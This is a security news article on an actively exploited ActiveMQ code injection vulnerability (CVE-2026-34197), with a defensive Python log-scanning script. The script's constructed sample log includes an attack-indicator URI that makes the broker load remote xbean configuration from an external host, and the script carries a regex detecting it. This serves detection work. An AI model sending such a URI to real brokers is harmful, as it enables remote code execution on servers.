
Nonprofit security organization Shadowserver has found that over 6,400 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting a high-severity code injection vulnerability.
Apache ActiveMQ is a popular open-source multi-protocol message broker used for asynchronous communication between Java applications.
Tracked as CVE-2026-34197, the vulnerability was discovered by Horizon3 researcher Naveen Sunkavally using the Claude AI assistant, after going undetected for 13 years.
As Sunkavally explained, the flaw stems from an improper input validation weakness that allows authenticated threat actors to execute arbitrary code on unpatched systems. The Apache maintainers patched the vulnerability on March 30 in ActiveMQ Classic versions 6.2.3 and 5.19.4.
As threat monitoring service Shadowserver warned on Monday, more than 6,400 IP addresses with Apache ActiveMQ fingerprints exposed online are also vulnerable to CVE-2026-34197 attacks, most of them in Asia (2,925), North America (1,409), and Europe (1,334).
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also warned on Thursday that this Apache ActiveMQ vulnerability is now actively exploited in attacks and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their servers by April 30.
“This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise,” the cybersecurity agency warned.
“Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.”
Horizon3 researchers advised admins to check the ActiveMQ broker logs for signs of exploitation by looking for suspicious broker connections that use the internal VM transport protocol together with the brokerConfig=xbean:http:// query parameter.
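The following script is an added example of that log check, not code from Horizon3 or the ActiveMQ project. It scans broker log lines for a vm:// transport URI whose brokerConfig parameter loads an xbean configuration over http or https, which is the indicator described above, and ignores a brokerConfig that points at a local file. The log lines are constructed to follow ActiveMQ's default log4j layout and use documentation IP ranges; whether and how your broker logs connector URIs depends on its logging configuration, so treat the line format as an assumption and adapt the regex to what your logs actually contain.

```python
"""Flag ActiveMQ broker log lines carrying the CVE-2026-34197 exploitation
indicator: a vm:// transport URI whose brokerConfig parameter fetches an
xbean configuration from a remote http(s) URL. Added example; the log lines
below are constructed, not real captures."""
import re
from urllib.parse import parse_qs, urlsplit

# A vm:// URI runs until the next whitespace in the default log layout (assumption).
VM_URI = re.compile(r"vm://\S+")
# xbean:http:// or xbean:https://, case-insensitive on the scheme.
REMOTE_XBEAN = re.compile(r"xbean:https?://", re.IGNORECASE)


def suspicious_vm_uris(lines):
    """Return (line_number, brokerConfig_value) for each line whose vm:// URI
    loads its broker configuration from a remote xbean:http(s):// location."""
    hits = []
    for n, line in enumerate(lines, 1):
        for match in VM_URI.finditer(line):
            # urlsplit handles the custom vm scheme; the query holds the params.
            params = parse_qs(urlsplit(match.group(0)).query)
            for cfg in params.get("brokerConfig", []):
                if REMOTE_XBEAN.match(cfg):
                    hits.append((n, cfg))
    return hits


# Constructed sample log lines in ActiveMQ's default log4j layout (not real data).
SAMPLE_LOG = """\
2026-04-02 09:14:05,118 | INFO  | Connector vm://localhost started | org.apache.activemq.broker.TransportConnector | main
2026-04-02 09:14:05,240 | INFO  | Connector openwire started | org.apache.activemq.broker.TransportConnector | main
2026-04-02 09:15:41,302 | INFO  | Connector vm://localhost?brokerConfig=xbean:http://203.0.113.9:8000/poc.xml started | org.apache.activemq.broker.TransportConnector | ActiveMQ Transport: tcp:///198.51.100.7:51332@61616
2026-04-02 09:15:42,011 | INFO  | Using Persistence Adapter: MemoryPersistenceAdapter | org.apache.activemq.broker.BrokerService | main
2026-04-02 09:16:03,556 | INFO  | Connector vm://localhost?brokerConfig=xbean:file:/opt/activemq/conf/activemq.xml started | org.apache.activemq.broker.TransportConnector | main
""".splitlines()


if __name__ == "__main__":
    # Usage: python check_activemq_log.py < activemq.log, or run as-is on the sample.
    for n, cfg in suspicious_vm_uris(SAMPLE_LOG):
        print(f"line {n}: broker config loaded remotely via {cfg}")
```

Only the third sample line is reported: it is the one where a client-originated vm:// connection carries a brokerConfig that fetches XML from an external host. The fifth line, which points at the broker's own local activemq.xml, is left alone so the check does not fire on a legitimate local configuration reference.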
“We recommend organizations running ActiveMQ treat this as a high priority, as ActiveMQ has been a repeated target for real-world attackers, and techniques for exploitation and post-exploitation of ActiveMQ are well known,” Horizon3 warned.
CISA has previously tagged two other Apache ActiveMQ vulnerabilities as exploited in the wild, tracked as CVE-2016-3088 and CVE-2023-46604, with the latter targeted by the TellYouThePass ransomware gang as a zero-day flaw.



